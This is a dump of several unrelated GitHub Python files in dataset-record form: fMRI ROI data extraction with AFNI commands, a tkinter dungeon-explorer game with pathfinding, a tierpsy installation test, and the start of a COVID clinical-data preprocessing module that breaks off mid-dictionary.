1)])).transpose()\nprint(df_adding_columns)\ndf_adding_columns.to_excel('task_5.xlsx')\n","repo_name":"tms-course/py-2022","sub_path":"maks_yakuta/lesson_6/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"38173827016","text":"\nimport os\nimport itertools\nimport logging\n\nimport numpy as np\n\nimport fmri_tools.analysis\nimport fmri_tools.utils\n\nimport ul_sens_analysis.config\nimport ul_sens_fmri.config\nimport runcmd\n\n\ndef run(subj_id, acq_date):\n\n conf = ul_sens_fmri.config.get_conf()\n conf.ana = ul_sens_analysis.config.get_conf()\n\n inf_str = subj_id + \"_ul_sens_\" + acq_date\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n glm_dir = os.path.join(subj_dir, conf.ana.glm_dir)\n\n log_dir = os.path.join(subj_dir, \"logs\")\n log_path = os.path.join(\n log_dir,\n \"{s:s}-glm_prep-log.txt\".format(s=inf_str)\n )\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n fmri_tools.utils.set_logger(\"screen\")\n fmri_tools.utils.set_logger(log_path)\n\n os.chdir(glm_dir)\n\n # convert the localiser GLM to masks in V1, V2, and V3\n mask_paths = _loc_to_mask(subj_id, acq_date, conf)\n\n _extract_data(subj_id, acq_date, conf, mask_paths)\n\n\ndef _loc_to_mask(subj_id, acq_date, conf):\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n loc_glm_dir = os.path.join(subj_dir, conf.ana.loc_glm_dir)\n\n os.chdir(loc_glm_dir)\n\n inf_str = subj_id + \"_ul_sens_\" + acq_date\n\n mask_paths = {}\n\n # go through combinations of visual field position and hemisphere\n for (vf, hemi) in itertools.product((\"upper\", \"lower\"), (\"lh\", \"rh\")):\n\n # this is the localiser GLM subbrick with the t-statistic for this\n # visual field location\n loc_t_path = \"{s:s}-loc_{v:s}-glm-{h:s}_nf.niml.dset\".format(\n s=inf_str, v=vf, h=hemi\n ) + \"[\" + conf.ana.loc_glm_brick + \"]\"\n\n # check it is correct\n assert fmri_tools.utils.get_dset_label(loc_t_path)[0] == vf + \"#0_Tstat\"\n\n # subject's ROI definitions for this hemisphere\n roi_path = os.path.join(\n conf.ana.roi_dir,\n subj_id,\n \"rois\",\n \"{s:s}_vis_loc_--rois-{h:s}_nf.niml.dset\".format(\n s=subj_id, h=hemi\n )\n )\n\n # this is the mask file to write\n mask_path = \"{s:s}-loc_{v:s}-mask-{h:s}_nf.niml.dset\".format(\n s=inf_str, v=vf, h=hemi\n )\n\n # we want the roi file to be 'amongst' the identifiers for V1-V3\n roi_test = \"amongst(a,\" + \",\".join(conf.ana.roi_numbers) + \")\"\n\n # we also want the t-value to be above a certain threshold\n loc_test = \"step(b-\" + conf.ana.loc_glm_thresh + \")\"\n\n # so it is an 'and' operation, and we want it to be labelled with the\n # ROI identified value so we multiply it by the outcome\n expr = \"'a*and(\" + roi_test + \",\" + loc_test + \")'\"\n\n cmd = [\n \"3dcalc\",\n \"-overwrite\",\n \"-a\", roi_path,\n \"-b\", loc_t_path,\n \"-expr\", expr,\n \"-prefix\", mask_path\n ]\n\n runcmd.run_cmd(\" \".join(cmd))\n\n # store the mask path to make it easier to access in the next step\n mask_paths[(vf, hemi)] = mask_path\n\n return mask_paths\n\n\ndef _extract_data(subj_id, acq_date, conf, mask_paths, loc_mask=True):\n\n inf_str = subj_id + \"_ul_sens_\" + acq_date\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n if loc_mask:\n mask_dir = os.path.join(subj_dir, \"loc_analysis\")\n analysis_dir = os.path.join(subj_dir, \"analysis\")\n else:\n mask_dir = os.path.join(subj_dir, \"post_analysis\", \"ret_roi\")\n analysis_dir = mask_dir\n\n n_rois = len(conf.ana.roi_names)\n n_vols_per_run = int(conf.exp.run_len_s / conf.ana.tr_s)\n\n # initialise our data container; rois x runs x volumes x vf\n data = np.empty(\n (\n n_rois,\n conf.exp.n_runs,\n n_vols_per_run,\n 2\n )\n )\n data.fill(np.NAN)\n\n for (i_vf, vf) in enumerate((\"upper\", \"lower\")):\n\n for run_num in range(1, conf.exp.n_runs + 1):\n\n run_dir = os.path.join(\n subj_dir,\n \"func\",\n \"run_{n:02d}\".format(n=run_num)\n )\n\n os.chdir(run_dir)\n\n # note that the last index here is hemisphere\n hemi_data = np.empty((n_rois, n_vols_per_run, 2))\n hemi_data.fill(np.NAN)\n\n for (i_hemi, hemi) in enumerate((\"lh\", \"rh\")):\n\n run_path = \"{s:s}-run_{n:02d}-uw-{h:s}_nf.niml.dset\".format(\n s=inf_str, n=run_num, h=hemi\n )\n\n # average across all nodes in each ROI and dump the timecourse\n # to standard out\n cmd = [\n \"3dROIstats\",\n \"-mask\", os.path.join(mask_dir, mask_paths[(vf, hemi)]),\n \"-1Dformat\",\n run_path\n ]\n\n # ... which we don't want to log!\n cmd_out = runcmd.run_cmd(\" \".join(cmd), log_stdout=False)\n\n # check the header for correctness\n roi_header = cmd_out.std_out.splitlines()[1].split(\"\\t\")[-3:]\n\n # make sure that the columns are what I think they are\n for (roi_head, roi_index) in zip(\n roi_header,\n conf.ana.roi_numbers\n ):\n assert roi_head.strip() == \"Mean_\" + roi_index\n\n # we want to clip out the header and the info lines\n run_data = cmd_out.std_out.splitlines()[3::2]\n\n # check we've done this correctly\n assert len(run_data) == n_vols_per_run\n\n for (i_vol, vol_data) in enumerate(run_data):\n\n # so this is just one line of data, tab-separated\n # we want to pull out our three ROIs, which will be the\n # last in the file\n vol_data = vol_data.split(\"\\t\")[-n_rois:]\n\n # store, for each of the ROIs\n hemi_data[:, i_vol, i_hemi] = vol_data\n\n # check that we've filled up the array as expected\n assert np.sum(np.isnan(hemi_data)) == 0\n\n # average over hemispheres\n hemi_data = np.mean(hemi_data, axis=-1)\n\n if loc_mask:\n mask_descrip = \"_\"\n else:\n mask_descrip = \"_ret_roi_\"\n\n run_path = \"{s:s}-run_{n:02d}-uw-{vf:s}{m:s}data.txt\".format(\n s=inf_str, n=run_num, vf=vf, m=mask_descrip\n )\n\n # save it out as a text file for this run; rois x vols\n np.savetxt(run_path, hemi_data)\n\n # we also want to save what 'nodes' in this data corresponds to; ie\n # ROI identifiers\n run_nodes_path = \"{s:s}-run_{n:02d}-uw-{vf:s}{m:s}nodes.txt\".format(\n s=inf_str, n=run_num, vf=vf, m=mask_descrip\n )\n\n np.savetxt(run_nodes_path, map(int, conf.ana.roi_numbers), \"%d\")\n\n # now we want to make it into an AFNI dataset so we can run the GLM\n # using their software\n run_path_niml = \"{s:s}-run_{n:02d}-uw-{v:s}{m:s}data.niml.dset\".format(\n s=inf_str, n=run_num, v=vf, m=mask_descrip\n )\n\n cmd = [\n \"ConvertDset\",\n \"-i_1D\",\n \"-input\", run_path,\n \"-node_index_1D\", run_nodes_path,\n \"-o_niml\",\n \"-prefix\", run_path_niml,\n \"-overwrite\"\n ]\n\n runcmd.run_cmd(\" \".join(cmd))\n\n data[:, run_num - 1, :, i_vf] = hemi_data\n\n assert np.sum(np.isnan(data)) == 0\n\n os.chdir(analysis_dir)\n\n data_path = \"{s:s}-{m:s}data.npy\".format(s=inf_str, m=mask_descrip)\n\n # we save the data here so we can access it independent of AFNI\n np.save(data_path, data)\n","repo_name":"mannion-lab/ul_sens_fmri_analysis","sub_path":"ul_sens_analysis/glm_prep.py","file_name":"glm_prep.py","file_ext":"py","file_size_in_byte":7795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74597181050","text":"from cmu_112_graphics import *\nfrom enemy_class import *\nfrom map import *\nfrom a_star import *\nfrom treasure_class import *\nfrom music import *\n\nimport math, random\n\n##########################################\n# Splash Screen Mode\n##########################################\n\ndef splashScreenMode_redrawAll(app, canvas):\n canvas.create_text(app.width/2, app.height/4, text='Welcome to',\n font='Rockwell 70', fill='purple')\n canvas.create_text(app.width/2, app.height/4 + 90, text='Dungeon Explorer!',\n font='Rockwell 70', fill='purple')\n canvas.create_text(app.width/2, app.height * 3/5, text='Press any key to enter the game!',\n font='Rockwell 30', fill='black')\n\ndef splashScreenMode_keyPressed(app, event):\n app.music.unpause()\n app.mode = 'gameMode'\n\n##########################################\n# Game Mode\n##########################################\n\ndef gameMode_redrawAll(app, canvas):\n #draws game map\n for row in range(app.startRow, app.startRow + app.cellsInView):\n for col in range(app.startCol, app.startCol + app.cellsInView):\n (x0, y0, x1, y1) = getCellBounds(app, row-app.startRow, col-app.startCol)\n if (enemyMap[row][col] == 0):\n fill = \"black\"\n else:\n fill = \"white\"\n canvas.create_rectangle(x0, y0, x1, y1, fill=fill)\n\n #shows the bullet when it's being shot\n if (app.shooting == True):\n canvas.create_image(app.shotX, app.shotY,\n image = getCachedPhotoImage(app, app.bulletSprite))\n #draws player\n playCellY, playCellX = getCell(app, app.playerX, app.playerY)\n if (playCellY in range(app.startRow, app.startRow + app.cellsInView) and\n playCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(app.playerX, app.playerY,\n image = getCachedPhotoImage(app, app.playerSprite))\n\n #draws treasure\n for treas in app.treasure:\n if (treas.treasureUp == True and \n treas.treasCellY in range(app.startRow, app.startRow + app.cellsInView) and\n treas.treasCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(treas.treasPosX, treas.treasPosY,\n image = getCachedPhotoImage(app, app.treasureSprite))\n\n #draws enemy\n for enem in app.enemies:\n if (enem.enemyAlive == True and \n enem.enemyCellY in range(app.startRow, app.startRow + app.cellsInView) and\n enem.enemyCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(enem.enemyPosX, enem.enemyPosY,\n image = getCachedPhotoImage(app, app.enemySprite))\n #displays how much treasure + lives are left\n canvas.create_text(15, 25, text = f\"Treasure Collected: {app.treasureFound}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20'))\n if app.treasureHintsOn == True:\n canvas.create_text(233, 25, text = f\"/{app.totalTreasure}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20')) \n canvas.create_text(15, 50, text = f\"Lives: {app.hp}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20'))\n \n #game over screen\n if app.gameOver == True:\n canvas.create_rectangle((app.width/2)-150, (app.height/2)-80,\n (app.width/2)+150, (app.height/2)+10, fill = \"white\",\n width = 5)\n canvas.create_rectangle((app.width/2)-140, (app.height/2)+30,\n (app.width/2)+140, (app.height/2)+70, fill = \"white\",\n width = 5)\n canvas.create_text(app.width/2, (app.height/2)-30, text = \"You Win!\",\n font = ('Rockwell', '40'), anchor = \"center\")\n canvas.create_text(app.width/2, (app.height/2)+50,\n text = \"Press 'R' to play again!\", font = ('Rockwell', '20'))\n #pause menu\n elif app.paused == True:\n font = 'Rockwell 20'\n canvas.create_rectangle((app.width/2)-150, (app.height/4)-60,\n (app.width/2)+150, (app.height/4)+40, fill = \"white\",\n width = 5)\n canvas.create_rectangle((app.width/2)-300, (app.height/2)-100,\n (app.width/2)+300, (app.height/2)+200, fill = \"white\",\n width = 5)\n canvas.create_rectangle(210, 305, 235, 330, fill = \"white\",\n width = 5)\n canvas.create_rectangle(335, 345, 360, 370, fill = \"white\",\n width = 5)\n if app.music.isPlaying():\n canvas.create_rectangle(218, 313, 227, 322, fill = \"black\",\n width = 5)\n if app.treasureHintsOn == True:\n canvas.create_rectangle(343, 353, 352, 362, fill = \"black\",\n width = 5)\n canvas.create_text(app.width/2, (app.height/4)-10, text = \"Game Paused\",\n font = ('Rockwell 30'))\n canvas.create_text((app.width/2)-270, (app.height/2)-55, text = \"Music\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)-15, text = \"Treasure Hints\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+25, text = \"Instructions:\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+60,\n text = \"Left click to move\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+90,\n text = \"Press Q to shoot enemies\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+120,\n text = \"Press E to blink to cursor position\",\n font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+150,\n text = \"Use WASD to adjust window\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+180,\n text = \"Avoid getting hit and collect all the treasure to win!\",\n font = font, anchor = W)\n\ndef gameMode_mousePressed(app, event):\n if app.paused == True and app.gameOver == False:\n #button for turning music on/off\n if (210 < event.x < 235 and 305 < event.y < 330):\n if (app.music.isPlaying()):\n app.music.pause()\n else:\n app.music.unpause()\n #button for turning hints on/off\n elif (335 < event.x < 360 and 345 < event.y < 370):\n if (app.treasureHintsOn == True):\n app.treasureHintsOn = False\n else:\n app.treasureHintsOn = True\n #moves the player towards where the mouse is pressed\n elif (event.x != app.playerX or event.y != app.playerY):\n app.moving = True\n app.destinationX = event.x\n app.destinationY = event.y\n\ndef gameMode_keyPressed(app, event):\n #CITATION: tkinter keys + other syntax from https://anzeljg.github.io/rin2/book2/2405/docs/tkinter/index.html\n #pauses game when p is pressed + unpauses when pressed again\n if app.gameOver == True:\n if event.key == 'r':\n appStarted(app, 'gameMode')\n else:\n return\n \n #to pause game\n if event.key == 'p':\n if app.paused == False:\n app.paused = True\n else:\n app.paused = False\n if app.paused == True:\n return\n \n #shoots an attack when q is pressed\n if event.key == 'q':\n if(app.shotX == app.aimedX and app.shotY == app.aimedY):\n return\n if app.shooting == False:\n app.shooting = True\n app.aimedX = app.mouseX\n app.aimedY = app.mouseY\n \n #blink to mouse position when e is pressed\n elif (event.key == 'e' and app.eOnCooldown == False):\n leftCellY, leftCellX = getCell(app, app.mouseX-40, app.mouseY)\n rightCellY, rightCellX = getCell(app, app.mouseX+40, app.mouseY)\n topCellY, topCellX = getCell(app, app.mouseX, app.mouseY-28)\n botCellY, botCellX = getCell(app, app.mouseX, app.mouseY+28)\n if (gameMap[leftCellY][leftCellX] == 1 and gameMap[rightCellY][rightCellX] == 1 and\n gameMap[topCellY][topCellX] == 1 and gameMap[botCellY][botCellX] == 1):\n d = ((app.playerX - app.mouseX)**2 + (app.playerY - app.mouseY)**2)**0.5\n dY = (app.playerY - app.mouseY)/d\n dX = (app.playerX - app.mouseX)/d\n #limits blink distance to 300 pixels away\n if d > 300:\n app.playerY -= (dY*300)\n app.playerX -= (dX*300)\n else:\n app.playerX = app.mouseX\n app.playerY = app.mouseY\n #stops player movement after blink and puts it on cooldown\n app.moving = False\n app.eOnCooldown = True\n \n #adjusts the view window using wasd keys\n if event.key == 's':\n if app.startRow + app.cellsInView < app.rows:\n app.startRow += 1\n app.playerY -= app.height/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosY != None):\n enem.enemyPosY -= app.height/app.cellsInView\n for treas in app.treasure:\n treas.treasPosY -= app.height/app.cellsInView\n if (app.destinationX != None):\n app.destinationY -= app.height/app.cellsInView\n elif event.key == 'w':\n if app.startRow - 1 >= 0:\n app.startRow -=1\n app.playerY += app.height/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosY != None):\n enem.enemyPosY += app.height/app.cellsInView\n for treas in app.treasure:\n treas.treasPosY += app.height/app.cellsInView\n if (app.destinationY != None):\n app.destinationY += app.height/app.cellsInView\n elif event.key == 'd':\n if app.startCol + app.cellsInView < app.cols:\n app.startCol += 1\n app.playerX -= app.width/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosX != None):\n enem.enemyPosX -= app.width/app.cellsInView\n for treas in app.treasure:\n treas.treasPosX -= app.width/app.cellsInView\n if (app.destinationX != None):\n app.destinationX -= app.height/app.cellsInView\n elif event.key == 'a':\n if app.startCol - 1 >= 0:\n app.startCol -= 1\n app.playerX += app.width/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosX != None):\n enem.enemyPosX += app.width/app.cellsInView\n for treas in app.treasure:\n treas.treasPosX += app.width/app.cellsInView\n if (app.destinationX != None):\n app.destinationX += app.height/app.cellsInView\n\ndef gameMode_mouseMoved(app, event):\n #gets mouse's current position\n app.mouseX = event.x\n app.mouseY = event.y\n\ndef gameMode_timerFired(app):\n #pauses game\n if app.paused == True:\n return\n\n #restarts the game when your hp reaches 0\n if app.hp == 0:\n appStarted(app, 'gameMode')\n\n #game is over when you have found all the treasure\n if app.treasureFound == app.totalTreasure:\n app.gameOver = True\n app.paused = True\n\n #controls player movement\n if(app.playerX == app.destinationX and app.playerY == app.destinationY):\n app.moving = False\n #has player move slowly towards where the mouse has clicked\n elif(app.moving == True):\n dist1 = ((app.playerX - app.destinationX)**2 +\n (app.playerY - app.destinationY)**2)**0.5\n dY1 = (app.playerY - app.destinationY)/dist1\n dX1 = (app.playerX - app.destinationX)/dist1\n if dist1 > 10:\n tempX = app.playerX\n tempY = app.playerY\n app.playerX -= 15*dX1\n app.playerY -= 15*dY1\n leftCellY, leftCellX = getCell(app, app.playerX-40, app.playerY)\n rightCellY, rightCellX = getCell(app, app.playerX+40, app.playerY)\n topCellY, topCellX = getCell(app, app.playerX, app.playerY-28)\n botCellY, botCellX = getCell(app, app.playerX, app.playerY+28)\n if (gameMap[leftCellY][leftCellX] == 0 or gameMap[rightCellY][rightCellX] == 0 or\n gameMap[topCellY][topCellX] == 0 or gameMap[botCellY][botCellX] == 0):\n app.playerX = tempX\n app.playerY = tempY\n else:\n app.playerX = app.destinationX\n app.playerY = app.destinationY\n\n #treasure collecting\n for treas in app.treasure:\n if(treas.treasureUp == True and \n treas.treasPosX - 50 <= app.playerX <= treas.treasPosX + 50 and\n treas.treasPosY - 50 <= app.playerY <= treas.treasPosY + 50):\n treas.treasureUp = False\n app.treasureFound += 1\n\n #controls bullet movement\n #keeps bullet starting point where the player is\n if (app.shooting == False):\n app.shotX, app.shotY = app.playerX, app.playerY\n #resets the bullet after it has reached its destination\n elif(app.shotX == app.aimedX and app.shotY == app.aimedY):\n app.shooting = False\n elif (app.shooting == True):\n dist2 = ((app.shotX - app.aimedX)**2 + (app.shotY - app.aimedY)**2)**0.5\n dY2 = (app.shotY - app.aimedY)/dist2\n dX2 = (app.shotX - app.aimedX)/dist2\n #limits the range of the bullet to 300 pixels\n if dist2 > 300:\n app.aimedY = app.shotY - (dY2*300)\n app.aimedX = app.shotX - (dX2*300)\n #bullet gradually travels to destination\n if dist2 > 70:\n app.shotX -= 70*dX2\n app.shotY -= 70*dY2\n #snaps to destination if it is less than 70 pixels away\n else:\n app.shotX = app.aimedX\n app.shotY = app.aimedY\n\n for enem in app.enemies:\n if(enem.enemyAlive == True):\n #if enemy hits player player loses 1 hp\n if(enem.enemyPosX - 70 <= app.playerX <= enem.enemyPosX + 70 and\n enem.enemyPosY - 70 <= app.playerY <= enem.enemyPosY + 70):\n enem.enemyAlive = False\n enem.enemyPosX = enem.enemyPosY = None\n app.hp -= 1\n #if bullet hits enemy, the enemy dies\n elif(enem.enemyPosX - 40 <= app.shotX <= enem.enemyPosX + 40 and\n enem.enemyPosY - 40 <= app.shotY <= enem.enemyPosY + 40):\n app.shooting = False\n enem.enemyAlive = False\n enem.enemyPosX = enem.enemyPosY = None\n \n #controls enemy movement through pathfinding\n for enem in app.enemies:\n if (enem.enemyAlive == True and \n enem.enemyCellY in range(app.startRow, app.startRow + app.cellsInView) and\n enem.enemyCellX in range(app.startCol, app.startCol + app.cellsInView)):\n playCellY, playCellX = getCell(app, app.playerX, app.playerY)\n if (playCellY in range(app.startRow, app.startRow + app.cellsInView) and\n playCellX in range(app.startCol, app.startCol + app.cellsInView)):\n path = a_star(gameMap, app.startCol, app.startRow, app.cellsInView, enem.enemyCellX,\n enem.enemyCellY, playCellX, playCellY)\n if((enem.enemyCellY != playCellY or enem.enemyCellX != playCellX) and path != None):\n x0, y0, x1, y1 = getCellBounds(app, path[1][0]-app.startRow,\n path[1][1]-app.startCol)\n enem.move(app.playerX, app.playerY, app.width/(app.cellsInView*2),\n x0, y0, x1, y1)\n enem.enemyCellY, enem.enemyCellX = getCell(app, enem.enemyPosX, enem.enemyPosY)\n path.pop(0)\n #makes it so that enemies keep chasing even if they're in the same cell as the player\n elif((enem.enemyPosY != playCellY or enem.enemyPosX != playCellX) and path != None):\n enem.move(app.playerX, app.playerY, app.width, None, None, None, None)\n\n #monitors blink cooldown\n if (app.eOnCooldown == True):\n app.eCooldown -= app.timerDelay\n if (app.eCooldown == 0):\n app.eCooldown = 5000\n app.eOnCooldown = False\n\n #respawns enemy at their original location after being dead for a certain \n #amount of time\n for enem in app.enemies:\n if enem.enemyAlive == False:\n enem.respawnTime -= app.timerDelay\n if (enem.respawnTime == 0):\n enem.respawnTime = 10000\n enem.enemyAlive = True\n enem.enemyCellX, enem.enemyCellY = enem.originX, enem.originY\n (x0, y0, x1, y1) = getCellBounds(app, enem.enemyCellY-app.startRow,\n enem.enemyCellX-app.startCol)\n enem.enemyPosX = (x0 + x1)/2\n enem.enemyPosY = (y0 + y1)/2\n\n##########################################\n# Main App\n##########################################\n\ndef appStarted(app, mode = 'splashScreenMode'):\n app.mode = mode\n app.timerDelay = 100\n app.paused = False\n app.gameOver = False\n app.treasureHintsOn = False\n #CITATION: music from the game Helltaker (link: https://www.youtube.com/watch?v=GzeBHIto4Ps)\n pygame.mixer.init()\n app.music = Music(\"Helltaker OST.mp3\")\n app.music.start()\n if app.mode == 'splashScreenMode':\n app.music.pause()\n #map/window attributes\n app.rows = len(gameMap)\n app.cols = len(gameMap[0])\n app.startRow = 12\n app.startCol = 12\n app.cellsInView = 7\n #player attributes\n app.playerX = 440\n app.playerY = 440\n app.moving = False\n app.shooting = False\n app.destinationX = None\n app.destinationY = None\n app.eOnCooldown = False\n app.eCooldown = 5000\n app.treasureFound = 0\n app.totalTreasure = 10\n app.hp = 5\n #bullet attributes\n app.shotR = 10\n app.shotX = None\n app.shotY = None\n app.aimedX = None\n app.aimedY = None\n #mouse attributes\n app.mouseX = 0\n app.mouseY = 0\n #sprites (drawn by myself)\n app.sprites = app.loadImage('slime sprites.png')\n app.playerSprite = app.sprites.crop((60, 25, 140, 81))\n app.bulletSprite = app.sprites.crop((200, 25, 250, 70))\n app.enemySprite = app.sprites.crop((62, 105, 145, 180))\n app.treasureSprite = app.sprites.crop((180, 90, 260, 170))\n #enemy attributes\n app.enemies = []\n for row in range(app.rows):\n for col in range(app.cols):\n if enemyMap[row][col] == 2:\n app.enemies += [Enemy(col, row)]\n for enem in app.enemies:\n (x0, y0, x1, y1) = getCellBounds(app, enem.enemyCellY-app.startRow,\n enem.enemyCellX-app.startCol)\n enem.enemyPosX = (x0 + x1)/2\n enem.enemyPosY = (y0 + y1)/2\n #treasure attributes\n app.treasure = []\n for row in range(app.rows):\n for col in range(app.cols):\n if treasMap[row][col] == 3:\n app.treasure += [Treasure(col, row)]\n for treas in app.treasure:\n (x0, y0, x1, y1) = getCellBounds(app, treas.treasCellY-app.startRow,\n treas.treasCellX-app.startCol)\n treas.treasPosX = (x0 + x1)/2\n treas.treasPosY = (y0 + y1)/2\n\n#CITATION: function from 15-112 images mini-lecture\ndef getCachedPhotoImage(app, image):\n #stores a cached photo\n if ('cachedPhotoImage' not in image.__dict__):\n image.cachedPhotoImage = ImageTk.PhotoImage(image)\n return image.cachedPhotoImage\n\ndef pointInGrid(app, x, y):\n return ((0 <= x <= app.width) and (0 <= y <= app.height))\n\n#CITATION: grid tkinter code from https://www.cs.cmu.edu/~112/notes/notes-animations-part2.html\ndef getCellBounds(app, row, col):\n gridWidth = app.width\n gridHeight = app.height\n cellWidth = gridWidth / app.cellsInView\n cellHeight = gridHeight / app.cellsInView\n x0 = col * cellWidth\n x1 = (col+1) * cellWidth\n y0 = row * cellHeight\n y1 = (row+1) * cellHeight\n return (x0, y0, x1, y1)\n\ndef getCell(app, x, y):\n #if (not pointInGrid(app, x, y)):\n # return (-1, -1)\n gridWidth = app.width\n gridHeight = app.height\n cellWidth = gridWidth / app.cellsInView\n cellHeight = gridHeight / app.cellsInView\n\n row = int(y / cellHeight) + app.startRow\n col = int(x / cellWidth) + app.startCol\n\n return (row, col)\n\ndef main():\n runApp(width=750, height=750)\n\nif __name__ == '__main__':\n main()","repo_name":"yiyunwei/15112tp","sub_path":"code/main_game.py","file_name":"main_game.py","file_ext":"py","file_size_in_byte":21155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5809449849","text":"import sys\nimport os\nimport pandas as pd\nimport tables\nimport h5py\nimport numpy as np\nimport cv2\n\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\nimport matplotlib\nmatplotlib.use(\"Qt5Agg\")\nimport matplotlib.pylab as plt\n\nimport tierpsy\nimport open_worm_analysis_toolbox\n\nif __name__ == '__main__':\n print(r\"%%%%%%% INSTALLATION TESTS %%%%%%%%\")\n print('python:', sys.executable)\n\n print(np.__name__, np.__version__)\n a = np.arange(10)\n print('test:', a)\n\n print(plt.__name__, plt.__version__)\n\n print(cv2.__name__, cv2.__version__)\n\n print(h5py.__name__, h5py.__version__)\n inputFiles = \"test.h5\"\n with h5py.File(inputFiles, 'w') as inputFileOpen:\n print('good h5py')\n\n print(tables.__name__, tables.__version__)\n with tables.File(inputFiles, 'w') as inputFileOpen:\n print('good tables')\n\n os.remove(inputFiles)\n\n print(pd.__name__, pd.__version__)\n\n print(tierpsy.__name__, tierpsy.__version__)\n print(open_worm_analysis_toolbox.__name__, open_worm_analysis_toolbox.__version__)\n\n if False:\n app = QApplication(sys.argv)\n w = QWidget()\n w.resize(250, 150)\n w.move(300, 300)\n w.setWindowTitle('Simple')\n w.show()\n sys.exit(app.exec_())\n","repo_name":"ver228/tierpsy-tracker","sub_path":"_old/installation/installation_test.py","file_name":"installation_test.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"36541553913","text":"import numpy as np\nimport pandas as pd\nimport datetime\n\n# explicitly require this experimental feature\nfrom sklearn.experimental import enable_iterative_imputer # noqa\nfrom sklearn.impute import IterativeImputer, KNNImputer\n\nfrom analyzer.utils import remove_missing\n\nRENAMED_ADMISSION_COLUMNS = {\n 'EDAD/AGE':'Age','SEXO/SEX':'Gender',\n 'DIAG ING/INPAT':'DIAG_TYPE',\n 'MOTIVO_ALTA/DESTINY_DISCHARGE_ING':'Outcome',\n 'F_INGRESO/ADMISSION_D_ING/INPAT':'Date_Admission',\n 'F_INGRESO/ADMISSION_DATE_URG/EMERG':'Date_Emergency',\n 'TEMP_PRIMERA/FIRST_URG/EMERG':'Body Temperature',\n 'FC/HR_PRIMERA/FIRST_URG/EMERG':'Cardiac Frequency',\n 'GLU_PRIMERA/FIRST_URG/EMERG':'Glycemia',\n 'SAT_02_PRIMERA/FIRST_URG/EMERG':'SaO2',\n 'TA_MAX_PRIMERA/FIRST/EMERG_URG':'Systolic Blood Pressure'}\n\nVITAL_COLUMNS ={\n 'PATIENT ID',\n 'Body Temperature',\n 'Cardiac Frequency',\n 'SaO2',\n 'Systolic Blood Pressure'\n }\n\nDEMOGRAPHICS_COLUMNS={'PATIENT ID','Gender','Age'}\n\nADMISSION_COLUMNS = ['PATIENT ID','Outcome','Date_Admission','Date_Emergency']\n\n\nRENAMED_LAB_MEASUREMENTS = {'BT -- BILIRRUBINA TOTAL ':'Total Bilirubin',\n 'GOT -- GOT (AST)':'Aspartate Aminotransferase (AST)',\n 'LEUC -- Leucocitos':'CBC: Leukocytes',\n 'HGB -- Hemoglobina':'CBC: Hemoglobin',\n 'VCM -- Volumen Corpuscular Medio':'CBC: Mean Corpuscular Volume (MCV)',\n 'GPT -- GPT (ALT)':'Alanine Aminotransferase (ALT)',\n 'NA -- SODIO':'Blood Sodium',\n 'LIN -- Linfocitos':'CBC: Lymphocytes',\n 'INR -- INR':'Prothrombin Time (INR)',\n 'K -- POTASIO':'Potassium Blood Level',\n 'COL -- COLESTEROL TOTAL':'Cholinesterase',\n 'SO2C -- sO2c (Saturación de oxígeno)':'ABG: Oxygen Saturation (SaO2)a',\n 'SO2CV -- sO2c (Saturación de oxígeno)':'ABG: Oxygen Saturation (SaO2)b',\n # '':'CBC: Red cell Distribution Width (RDW) '\n 'PLAQ -- Recuento de plaquetas':'CBC: Platelets',\n 'PCR -- PROTEINA C REACTIVA':'C-Reactive Protein (CRP)',\n 'U -- UREA':'Urea',\n 'CREA -- CREATININA':'Blood Creatinine',\n 'CA -- CALCIO ':'Blood Calcium',\n 'AMI -- AMILASA':'Blood Amylase',\n 'APTT -- TIEMPO DE CEFALINA (APTT':'Activated Partial Thromboplastin Time (aPTT)',\n 'HCO3 -- HCO3-':'ABG: standard bicarbonate (sHCO3)',\n 'PH -- pH':'ABG: pH',\n 'PO2 -- pO2':'ABG: PaO2',\n 'PCO2 -- pCO2':'ABG: PaCO2',\n # '':'ABG: MetHb',\n 'LAC -- LACTATO':'ABG: Lactic Acid',\n # '':'ABG: COHb',\n 'BE(b) -- BE(b)':'ABG: Base Excess',\n 'LEUORS -- Leucocitos':'CBC: Leukocytes4',\n 'DD -- DIMERO D':'D-Dimer',\n 'GLU -- GLUCOSA':'Glycemia'}\n\nLAB_METRICS = ['Total Bilirubin','Aspartate Aminotransferase (AST)',\n 'CBC: Leukocytes','CBC: Hemoglobin', 'CBC: Mean Corpuscular Volume (MCV)',\n 'Alanine Aminotransferase (ALT)','Blood Sodium',\n 'Prothrombin Time (INR)','Potassium Blood Level','Cholinesterase',\n 'CBC: Platelets','C-Reactive Protein (CRP)','Urea','Blood Creatinine',\n 'Blood 